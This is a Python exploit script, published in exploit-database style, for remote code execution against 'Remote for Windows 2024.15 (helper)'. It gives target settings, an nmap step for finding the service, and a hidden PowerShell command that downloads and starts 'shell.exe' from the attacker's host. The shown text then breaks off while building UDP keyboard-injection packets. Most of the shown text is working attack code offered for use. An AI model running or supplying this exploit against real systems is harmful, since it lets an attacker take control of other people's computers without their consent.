# Exploit Title: Remote for Windows 2024.15 (helper) - RCE V2 # Date: 2025-06-13 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://rs.ltd # Software Link: https://rs.ltd/latest.php?os=win # Version: 2024.15 # Tested on: Windows 10/11 with Remote for Windows (helper) #!/usr/bin/env python3 ''' Remote for Windows 2024.15 (helper) - RCE V2 this rce works when the "ask to grant access for unknown iOS devices" in settings is unchecked # Identification: nmap -p- -T4 --script ssl-cert Look for SSL cert with subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US ''' #!/usr/bin/env python3 import requests from scapy.all import IP, UDP, send, Raw import socket import time import urllib3 import struct urllib3.disable_warnings() target = "192.168.8.105" port = 49718 lhost = "192.168.8.100" payload = "shell.exe" cmd_string = f"cmd /c powershell -nop -w hidden -c \"$p='C:\\Windows\\Temp\\s.exe';Invoke-WebRequest -Uri http://{lhost}/{payload} -OutFile $p;Start-Process $p\"" def send_udp_packet(data): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(data, (target, port)) sock.close() def send_keycode_keyboard_event(keycode, is_down, is_extended=False): flags = 0 if is_down: flags |= 1 if is_extended: flags |= 128 packet = struct.pack("